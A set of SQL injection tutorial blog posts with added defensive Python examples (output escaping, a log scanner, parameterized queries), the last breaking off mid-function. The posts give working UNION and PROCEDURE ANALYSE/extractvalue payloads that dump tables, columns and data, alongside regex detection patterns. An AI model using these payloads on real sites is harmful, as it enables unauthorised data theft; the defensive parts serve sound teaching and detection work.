<span style="font-size: small;">When the vulnerable column is in the page source:</span><br />
<span style="font-size: small;"><b>Concat(<span style="color: red;">STARTING_HTML_TAG</span>,OUR_QUERY,<span style="color: red;">ENDING_HTML_TAG</span>)</b></span><br />
<span style="font-size: small;">So we will use this <b>HTML tag</b> to display data on the page if our vulnerable column is in the page source:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>HTML TAG: Concat(&lt;font size="8" color="red"&gt;,Version(),&lt;/font&gt;)</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">And sometimes our vulnerable column is in the title; in that case we use this <b>HTML tag</b> to print the data on the web page:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>HTML TAG: Concat(&lt;/title&gt;,Version())</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Use these <b>HTML tags</b> after encoding them as <b>hex values</b>, or put a <b>single quote</b> before and after the <b>HTML tag</b>, to make the query executable.</span><br />
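<span style="font-size: small;">The trick described in this post only works because the page copies the query result into its HTML without encoding it. The following is an added example (not the post's code and not any site's) that shows that failure mode beside its fix, with constructed values standing in for what Concat('&lt;font color=red&gt;', version()) and Concat('&lt;/title&gt;', version()) would return; the page template and the version string are assumptions.</span><br />

```python
"""Added example (not from the blog post): why HTML placed in a CONCAT()
result renders on the page, and what stops it. The application copies a
database value into its HTML without output encoding, so a value such as
"<font color=red>5.5.44" is parsed as markup. Encoding the value at output
time shows it as text instead.

Assumptions: the minimal page template below and the constructed values
standing in for Concat('<font color=red>', version()) and
Concat('</title>', version()) from the post.
"""
import html
from html.parser import HTMLParser

# Constructed stand-ins for what the injected queries in the post return.
RED_VERSION = "<font color=red>5.5.44"    # source-page variant
TITLE_BREAKOUT = "</title>5.5.44"          # <title> variant
TEMPLATE_TAGS = {"html", "head", "title", "body", "p"}


def render_unsafe(title_value, body_value):
    """The vulnerable pattern: database values interpolated verbatim."""
    return (f"<html><head><title>{title_value}</title></head>"
            f"<body><p>{body_value}</p></body></html>")


def render_safe(title_value, body_value):
    """Same template with output encoding: html.escape turns <, >, &, and
    quotes into entities, so the browser shows the characters and opens no tag."""
    return (f"<html><head><title>{html.escape(title_value)}</title></head>"
            f"<body><p>{html.escape(body_value)}</p></body></html>")


class _TagCollector(HTMLParser):
    """Records the tags a browser would actually open and close."""

    def __init__(self):
        super().__init__()
        self.starts, self.ends = [], []

    def handle_starttag(self, tag, attrs):
        self.starts.append(tag)

    def handle_endtag(self, tag):
        self.ends.append(tag)


def parsed_tags(page):
    p = _TagCollector()
    p.feed(page)
    p.close()
    return p.starts, p.ends


def injected_tags(page):
    """Start tags present in the page that the template itself never emits."""
    starts, _ = parsed_tags(page)
    return [t for t in starts if t not in TEMPLATE_TAGS]


def title_end_tags(page):
    """How many </title> the parser saw: 1 is normal, 2 means the value
    closed the title element early and the rest landed in the document."""
    return parsed_tags(page)[1].count("title")


if __name__ == "__main__":
    print("unsafe body :", injected_tags(render_unsafe("Events", RED_VERSION)))
    print("safe body   :", injected_tags(render_safe("Events", RED_VERSION)))
    print("unsafe title:", title_end_tags(render_unsafe(TITLE_BREAKOUT, "ok")))
    print("safe title  :", title_end_tags(render_safe(TITLE_BREAKOUT, "ok")))
```

<span style="font-size: small;">The unsafe render opens a font tag the template never wrote and closes the title element at the injected position, which is exactly the behaviour the post relies on; the escaped render opens nothing extra and keeps a single title element. Encoding at the point of output is the fix because it does not depend on how the value reached the database result.</span><br />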
<span style="font-size: small;"><span style="color: red;">Happy</span> <span style="color: magenta;">Injecting</span> <span style="color: #a64d79;">!!</span></span><br />
<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</b></span><br />
<br />
<span style="font-size: small;"><b>Post Parameters Injection Through Live HTTP Headers</b> (published 2015-07-10, updated 2015-08-17)</span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9xvg8b0GkHbI82qXjPK_VE4ku1Ds_VmlJo7UI8cDVaM7LJYmyf3SB0plQrQrnzekBduOxiD5WKcoo63N83p7Yc-gWhspYLbG1opveddsGlnQ8z84MamaYCLM27lm6dOrbJt7CbA-Rt0b9/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers+tutorial.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Post Parameters Injection Through Live HTTP Headers" border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9xvg8b0GkHbI82qXjPK_VE4ku1Ds_VmlJo7UI8cDVaM7LJYmyf3SB0plQrQrnzekBduOxiD5WKcoo63N83p7Yc-gWhspYLbG1opveddsGlnQ8z84MamaYCLM27lm6dOrbJt7CbA-Rt0b9/s400/Post+Parameters+Injection+Through+Live+HTTP+Headers+tutorial.png" title="Post Parameters Injection Through Live HTTP Headers" width="400" /></a></span><br />
<span style="font-size: small;"><b> Post Parameters Injection Through Live HTTP Headers - Tutorial By RAi Jee</b></span><br />
<span style="font-size: small;">In this tutorial you will learn how to inject a website through POST parameters with Live HTTP Headers.</span><br />
<span style="font-size: small;">First you need the Live HTTP Headers add-on installed in your browser. If you don't have this add-on, you can install it from this link.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;"><a href="https://addons.mozilla.org/en-us/firefox/addon/live-http-headers/" target="_blank">Live HTTP Headers</a></span><br />
<span style="font-size: small;">Now let's start our tutorial.</span><br />
<span style="font-size: small;">Here is our target site; there you can see a search box.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8OQDRLFKBLnFv4xlGpalaS0qdfQ8fDO8jS7q1QgE05BdvNplkbLuBoJ6-2S9Cnb0gK59I_toO7odaSUAxVp1N900PLnDmJZ6WRdtTc2BiC1epJmtL8t1vIKRGquyzPkh5Y6U4RCcxu6WT/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers+1.+www.raijee1337.blogspot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Post Parameters Injection Through Live HTTP Headers" border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8OQDRLFKBLnFv4xlGpalaS0qdfQ8fDO8jS7q1QgE05BdvNplkbLuBoJ6-2S9Cnb0gK59I_toO7odaSUAxVp1N900PLnDmJZ6WRdtTc2BiC1epJmtL8t1vIKRGquyzPkh5Y6U4RCcxu6WT/s400/Post+Parameters+Injection+Through+Live+HTTP+Headers+1.+www.raijee1337.blogspot.png" title="Post Parameters Injection Through Live HTTP Headers" width="400" /></a></span></div>
<span style="font-size: small;">Now input some text in that search box and open the Live HTTP Headers add-on. Then click on the search button to execute the search.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPZOrXu_6JnC0U-pO7PvnQM1r3k_4uuwAjBAH4sDgvsqfOHVkoJDM7G_9uObBQaaYNnlgMMvdrAuS84aQEdNe9OBeavIikGUmSEqMev2Jh0T-9d0RS3VOh9Xgz25GBjYBUAVk-KsdPotSz/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers+2.+www.raijee1337.blogspot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Post Parameters Injection Through Live HTTP Headers" border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPZOrXu_6JnC0U-pO7PvnQM1r3k_4uuwAjBAH4sDgvsqfOHVkoJDM7G_9uObBQaaYNnlgMMvdrAuS84aQEdNe9OBeavIikGUmSEqMev2Jh0T-9d0RS3VOh9Xgz25GBjYBUAVk-KsdPotSz/s400/Post+Parameters+Injection+Through+Live+HTTP+Headers+2.+www.raijee1337.blogspot.png" title="Post Parameters Injection Through Live HTTP Headers" width="400" /></a></span></div>
<span style="font-size: small;">After clicking on the search button, look in Live HTTP Headers to find the POST parameter we have entered there.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo-x4-ihVSnR1uPo8XVZpl4BwFBMLDyxz5jW6WcOmKSmnMhKMdl19WV48fcHieDX0pJOEXefkIhlwMMRDAuK7Akf994VOWOq7Ghlw6tPsCIYs-VfmAaYyTyaDAIiP-NYkII1QG1ALQ4ZYg/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Post Parameters Injection Through Live HTTP Headers" border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo-x4-ihVSnR1uPo8XVZpl4BwFBMLDyxz5jW6WcOmKSmnMhKMdl19WV48fcHieDX0pJOEXefkIhlwMMRDAuK7Akf994VOWOq7Ghlw6tPsCIYs-VfmAaYyTyaDAIiP-NYkII1QG1ALQ4ZYg/s400/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+5.png" title="Post Parameters Injection Through Live HTTP Headers" width="400" /></a></span></div>
<span style="font-size: small;">And our POST parameters are <b>inputsbox=raijee&x=11&y=9</b>. Let's add a single quote at the end, <b>inputsbox=raijee'</b>, to check whether it is vulnerable or not. Click on the REPLAY option in Live HTTP Headers to send our modified POST parameters.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieKAq9g_zLVX7vKY1sMEeizTTZ3uh_RQj563t8JFBE6o8jXq4DtSSER2yynPe-zn0pOUvCtBW4OyIPj9KMOt_l8JCdoxD2b5w8YpSNYYfnQBbYuXSDmGeBIo2F84loSIGTN6Hz1CzWt9Ki/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Post Parameters Injection Through Live HTTP Headers" border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieKAq9g_zLVX7vKY1sMEeizTTZ3uh_RQj563t8JFBE6o8jXq4DtSSER2yynPe-zn0pOUvCtBW4OyIPj9KMOt_l8JCdoxD2b5w8YpSNYYfnQBbYuXSDmGeBIo2F84loSIGTN6Hz1CzWt9Ki/s400/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+7.png" title="Post Parameters Injection Through Live HTTP Headers" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now we can see our target is vulnerable to SQL injection. Next we execute our string-based ORDER BY command to find the total number of columns. We add our command <b>inputsbox=raijee' order by 15-- -</b></span><br />
<span style="font-size: small;">After executing <b>inputsbox=raijee' order by 7-- -&x=11&y=9</b> we didn't get any result and no error either, and after trying 8 columns in the ORDER BY statement it gives a MySQL error. This means there are 7 columns in total.</span><br />
<span style="font-size: small;">Now let's execute the UNION SELECT command to find the vulnerable columns.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd5U7zXn2hLAP5ALcCBu2Ul13Dk8y-4PBsXZRSLq6Dj5T0sU6rlPOFaKMQ6Tp7qLFqnYEdDI1qXQnDJxt9EgUDYKB0eoZeUIWgt3RRZKl3KHMe7IaBqj4B9eTuBXoNEp0F33BIQh5k6QUs/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Post Parameters Injection Through Live HTTP Headers" border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd5U7zXn2hLAP5ALcCBu2Ul13Dk8y-4PBsXZRSLq6Dj5T0sU6rlPOFaKMQ6Tp7qLFqnYEdDI1qXQnDJxt9EgUDYKB0eoZeUIWgt3RRZKl3KHMe7IaBqj4B9eTuBXoNEp0F33BIQh5k6QUs/s400/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+9.png" title="Post Parameters Injection Through Live HTTP Headers" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We found that columns 3 and 1 are vulnerable. Let's add our query for finding the version.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiJMVm0b7nkgFqg5ZdPgzEY013jaFwApcfv-bsSkcoZalPMAFcNqdWx5J8m2Qkpaf1RwiXhAxTRicrdbpr8Fy1-h2C8PLsQfEEHkUiVX_416rxQwR1eMyM2JC1Vxwjg2vOxe09-xGtJB_y/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Post Parameters Injection Through Live HTTP Headers" border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiJMVm0b7nkgFqg5ZdPgzEY013jaFwApcfv-bsSkcoZalPMAFcNqdWx5J8m2Qkpaf1RwiXhAxTRicrdbpr8Fy1-h2C8PLsQfEEHkUiVX_416rxQwR1eMyM2JC1Vxwjg2vOxe09-xGtJB_y/s400/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+10.png" title="Post Parameters Injection Through Live HTTP Headers" width="400" /></a></span></div>
<span style="font-size: small;">You can see the version printed there.</span><br />
<span style="font-size: small;">For getting tables and columns and then extracting data from the tables:</span><br />
<span style="font-size: small;"><a href="http://www.raijee1337.blogspot.com/2015/05/union-based-sql-injection-waf-bypass.html" target="_blank">READ THIS TUTORIAL</a></span><br />
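<span style="font-size: small;">Seen from the server side, the sequence in this post and in the login-panel post above (single-quote test, ORDER BY counting, UNION SELECT) leaves a recognisable trail in the POST bodies. The following is an added example, not from the posts, that scans constructed request-log lines carrying those same parameters (inputsbox=..., uname=...); the log format, the rule set and the sample lines are assumptions.</span><br />

```python
"""Added example (not from the blog posts): what the server side can see of
the probing sequence the posts walk through (quote test, ORDER BY counting,
UNION SELECT). The access-log lines are constructed and carry the decoded
POST body; the line format and the rules are assumptions, not any product's.
"""
import re
from urllib.parse import parse_qs

# Constructed sample: "<method> <path> <form-encoded body>" per line, mirroring
# the parameters shown in the posts (inputsbox=..., uname=...).
SAMPLE_LOG = """\
POST /search.php inputsbox=raijee&x=11&y=9
POST /search.php inputsbox=rock+%27n%27+roll&x=11&y=9
POST /search.php inputsbox=raijee%27&x=11&y=9
POST /search.php inputsbox=raijee%27+order+by+7--+-&x=11&y=9
POST /search.php inputsbox=raijee%27+order+by+8--+-&x=11&y=9
POST /login.php uname=raijee%27+order+by+5%23&pass=x
POST /login.php uname=raijee%27+UNION+SELECT+1,2,3,4%23&pass=x
"""

# Each rule: a name and a regex applied to one decoded parameter value.
RULES = [
    ("order_by_probe", re.compile(r"'\s*order\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"union\s+(all\s+)?select\b", re.I)),
    ("comment_tail", re.compile(r"(--\s*-?\s*|#)$")),   # MySQL '-- -' and '#' terminators
]


def scan_body(body):
    """Return (param, rule) pairs for every parameter value matching a rule.
    parse_qs decodes %27 and '+' first, so the regexes see the real text."""
    hits = []
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            for name, rx in RULES:
                if rx.search(value):
                    hits.append((param, name))
    return hits


def scan_log(log):
    """Annotate each request. A quote on its own (lines 2 and 3) is recorded
    but not alerted on, because ordinary input contains apostrophes too."""
    out = []
    for line in log.splitlines():
        method, path, body = line.split(" ", 2)
        hits = scan_body(body)
        quote_only = not hits and any(
            "'" in v for vs in parse_qs(body).values() for v in vs)
        out.append({"path": path, "hits": hits, "quote_only": quote_only})
    return out


def count_probes_per_path(log):
    """Several probes against one path in a row are the stronger signal;
    the ORDER BY counting loop alone produces one request per guess."""
    counts = {}
    for r in scan_log(log):
        if r["hits"]:
            counts[r["path"]] = counts.get(r["path"], 0) + 1
    return counts


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(r)
    print(count_probes_per_path(SAMPLE_LOG))
```

<span style="font-size: small;">The first two requests produce no hits, the bare quote is flagged only as quote_only, and the ORDER BY and UNION lines each match the probe rule plus the comment-terminator rule. Counting hits per path groups the counting loop into one event rather than one alert per guess, which is the shape an analyst wants to see.</span><br />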
<span style="font-size: small;">AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</span><br />
<span style="font-size: small;"><b>Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial</b> (published 2015-07-08, updated 2015-08-17)</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiohoJDzVL8hOnRapDFjbbNuwRamEdF49gHTIOh70ZobWHW-b2rdp3ztIBBmqgBLx4O4_fNj8GrM5tqXhXj2Hr6lU_6d1C6bom6d4swZ_0TjjvxC8Blgh434WAIkDgU8hdCzRCmjB4tgqFM/s1600/Bypassing+Incorrect+Usage+of+UNION+and+++ORDER+BY+-Tutorial+By+RAi+Jee.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiohoJDzVL8hOnRapDFjbbNuwRamEdF49gHTIOh70ZobWHW-b2rdp3ztIBBmqgBLx4O4_fNj8GrM5tqXhXj2Hr6lU_6d1C6bom6d4swZ_0TjjvxC8Blgh434WAIkDgU8hdCzRCmjB4tgqFM/s320/Bypassing+Incorrect+Usage+of+UNION+and+++ORDER+BY+-Tutorial+By+RAi+Jee.png" title="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" width="320" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Bypassing Incorrect usage of UNION and ORDER BY -Tutorial</b> <b>By RAi Jee</b></span><br />
<span style="font-size: small;">In the previous tutorial we discussed</span><br />
<span style="font-size: small;"><a href="http://www.raijee1337.blogspot.com/2015/07/bypassing-error-allowed-memory-size-of.html" target="_blank"><b>Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted</b></a></span><br />
<span style="font-size: small;">Today's topic is how we can bypass the <b>Incorrect Usage of UNION and ORDER BY</b> error.</span><br />
<span style="font-size: small;">So let's start our manual injection. Our target site is vulnerable to SQL injection.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now we will try to find the total number of columns. We will use ORDER BY for counting columns.</span><br />
<span style="font-size: small;">Here is our query:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakSite.com/detail.php?id=12 order by 6-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We got an error here!</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRUBMyFHMtueZBhE__0voIgpOzzCnsxC-HXR3t7_REwXTpyyoBYNiUCZqezoo9emR1SBQ4L3dsx8P4wYyqiNfEunrtwL6eqUqMr1og90BEiQTeCmu-b-HNmoWuyVgToytGtcu5p1uTsxSH/s1600/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-Tutorial+by+RAi+Jee.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="49" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRUBMyFHMtueZBhE__0voIgpOzzCnsxC-HXR3t7_REwXTpyyoBYNiUCZqezoo9emR1SBQ4L3dsx8P4wYyqiNfEunrtwL6eqUqMr1og90BEiQTeCmu-b-HNmoWuyVgToytGtcu5p1uTsxSH/s640/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-Tutorial+by+RAi+Jee.png" width="640" /></a></span></div>
<span style="font-size: small;"><b>You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near 'order by
5-- -,10' at line 1</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Let's decrease our column count from 6 to 3.</span><br />
<span style="font-size: small;"><b>http://www.FakSite.com/detail.php?id=12</b> <b>order by 3--</b> -</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Still the same ERROR!!</span><br />
<span style="font-size: small;"><b>You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near 'order by 3 -- -,10' at line 1</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now try only one column in the ORDER BY command.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakSite.com/detail.php?id=12</b> <b>order by 1--</b> -</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We got the same again.</span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near 'order by 1 -- -,10' at line 1</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Again the same error, even with only 1 column in the ORDER BY count. So now we will try to guess the number of columns ourselves.</span><br />
<span style="font-size: small;">So we will send a UNION SELECT statement with 3 columns.</span><br />
<span style="font-size: small;">And our query will be:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakSite.com/detail.php?id=12</b> <b>UnION SEleCT 1,2,3--</b> -</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After executing our query we got an error!!</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq7zabFb0Y1jt9nq-yzyMsBJdEXdmLfyhupJN93Lc9QWJGGHyXTDeRjSXpXMqCZP1jhyphenhyphenbowW9Dx9GKr6_K2gYrI38rrkXgczGxBKDf6-Z9BK1keC0jXSmvips9pq1iEwziLjxECMB4QTAm/s1600/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-+Tutorial+by+RAi+Jee.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" border="0" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq7zabFb0Y1jt9nq-yzyMsBJdEXdmLfyhupJN93Lc9QWJGGHyXTDeRjSXpXMqCZP1jhyphenhyphenbowW9Dx9GKr6_K2gYrI38rrkXgczGxBKDf6-Z9BK1keC0jXSmvips9pq1iEwziLjxECMB4QTAm/s400/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-+Tutorial+by+RAi+Jee.png" title="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;">We got the error <b>"Incorrect usage of UNION and ORDER BY"</b>.</span><br />
<span style="font-size: small;">Hmmm, as you can see, we cannot inject with a UNION SELECT query here: that error means the application's own ORDER BY already sits before the point where our input lands, and MySQL does not accept a UNION after an ORDER BY.</span><br />
<span style="font-size: small;">So we use <b>PROCEDURE ANALYSE</b> with an <b>XPath extractvalue</b> query to bypass the <b>Incorrect Usage of UNION and ORDER BY</b> error; PROCEDURE is one of the few clauses the MySQL grammar still allows after ORDER BY and LIMIT, and the extractvalue() inside it raises the error that carries the output.</span><br />
<span style="font-size: small;">Here is the query of <b>PROCEDURE ANALYSE</b> with <b>XPath extractvalue:</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><b>http://www.FakSite.com/detail.php?id=12 </b>Procedure Analyse (extractvalue(0,concat(0x27,0x524169204a6565,0x3a,@@version)),1)-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
BinGOOOO, the error is gone!!!</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs1wSYBtZEY9JroVUDUUEprzZ8llKie2TjFfaSqL3VTs5Q3ab1Lfr563OX1Nkr2xnEqWntJx0C6EhgQ8W73lSdFOYe8_u0ryxwVFGJhGNTUuo150bUQJi0Q2_m8NjoxvT25ufKQIgyhmNn/s1600/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-+Tutorial+by+RAi+Jee1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs1wSYBtZEY9JroVUDUUEprzZ8llKie2TjFfaSqL3VTs5Q3ab1Lfr563OX1Nkr2xnEqWntJx0C6EhgQ8W73lSdFOYe8_u0ryxwVFGJhGNTUuo150bUQJi0Q2_m8NjoxvT25ufKQIgyhmNn/s400/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-+Tutorial+by+RAi+Jee1.png" title="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;">As we asked for VERSION in the query, you can see the version in the picture above.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now let's add the query for tables:</span><br />
<span style="font-size: small;"><b><b>http://www.FakSite.com/detail.php?id=12 </b>Procedure Analyse (extractvalue(0,concat(0x27,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)-- </b>-</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi50NogXhU6g94Knt9DlouTD18h6fVfvBlPwOBlhBaxGIUSphp1y1FXWwug2Sp8uOMs4-icv0Wt3yVdvyUMg3z_V5AcZpCiwkjud9aKxXRkk-hLInEPMSmO2xJchHhFe7yCLkJPJihr3afP/s1600/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-Tutorial+by+RAi+Jee2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" border="0" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi50NogXhU6g94Knt9DlouTD18h6fVfvBlPwOBlhBaxGIUSphp1y1FXWwug2Sp8uOMs4-icv0Wt3yVdvyUMg3z_V5AcZpCiwkjud9aKxXRkk-hLInEPMSmO2xJchHhFe7yCLkJPJihr3afP/s400/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-Tutorial+by+RAi+Jee2.png" title="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;">And we got tables there, but we can see only some of the table names.</span><br />
<span style="font-size: small;">For all tables we add the substr function to our query to get the other tables from the database.</span><br />
<span style="font-size: small;"><b><b>http://www.FakSite.com/detail.php?id=12 </b>Procedure Analyse (extractvalue(0,concat(0x27,(select substr(group_concat(table_name),10,50) from information_schema.tables where table_schema=database()))),1)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Increase the values 10,50 in the query to get the other tables in the database.</span><br />
<span style="font-size: small;">Next we have to get the column names from our targeted table.</span><br />
<span style="font-size: small;">Here is the query for getting column names:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><b>http://www.FakSite.com/detail.php?id=12 </b>Procedure Analyse
(extractvalue(0,concat(0x27,(select group_concat(column_name) from information_schema.columns
where table_name='OUR TABLE_NAME HERE'))),1)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">And the last part is extracting data from the columns.</span><br />
<span style="font-size: small;">Here is the final query for extracting data from the columns:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><b>http://www.FakSite.com/detail.php?id=12 </b>Procedure Analyse
(extractvalue(0,concat(0x27,(select group_concat(OUR_COLUMN_HERE) from OUR_TABLE_NAME_HERE))),1)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
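<span style="font-size: small;">The following Python script is an added example and not part of the original post or the site it describes. The error text above, with its trailing ',10', suggests the injected value lands in a clause that already follows the application's own ORDER BY; the script assumes that layout (a LIMIT offset built by string concatenation, with sqlite3 standing in for MySQL and a constructed table named detail) and reproduces the same parse failure for the ORDER BY and UNION probes. It then shows the developer-side fix: validate the id as an integer and bind it as a parameter, so the same inputs are refused before they ever reach the SQL parser.</span><br />

```python
import re
import sqlite3


def make_db():
    """Constructed schema standing in for the page's detail.php back end
    (assumption: sqlite3 is used because it ships with Python; the parse
    failure demonstrated here is the same class as the MySQL errors above)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE detail (id INTEGER PRIMARY KEY, title TEXT, price REAL)")
    con.executemany("INSERT INTO detail VALUES (?, ?, ?)",
                    [(i, f"item{i}", float(i)) for i in range(1, 31)])
    return con


def query_vulnerable(con, raw_id):
    """String-built query. The user value lands in the LIMIT clause, after the
    query's own ORDER BY (a hypothetical layout consistent with the ',10' tail
    in the page's error text)."""
    sql = f"SELECT id, title FROM detail WHERE price > 0 ORDER BY title LIMIT {raw_id},10"
    return con.execute(sql).fetchall()


def query_safe(con, raw_id):
    """Validate first, then bind. A LIMIT offset can only be a non-negative
    integer, so anything else is refused before the SQL parser sees it."""
    if not isinstance(raw_id, str) or not re.fullmatch(r"[0-9]+", raw_id):
        raise ValueError("id must be a non-negative integer")
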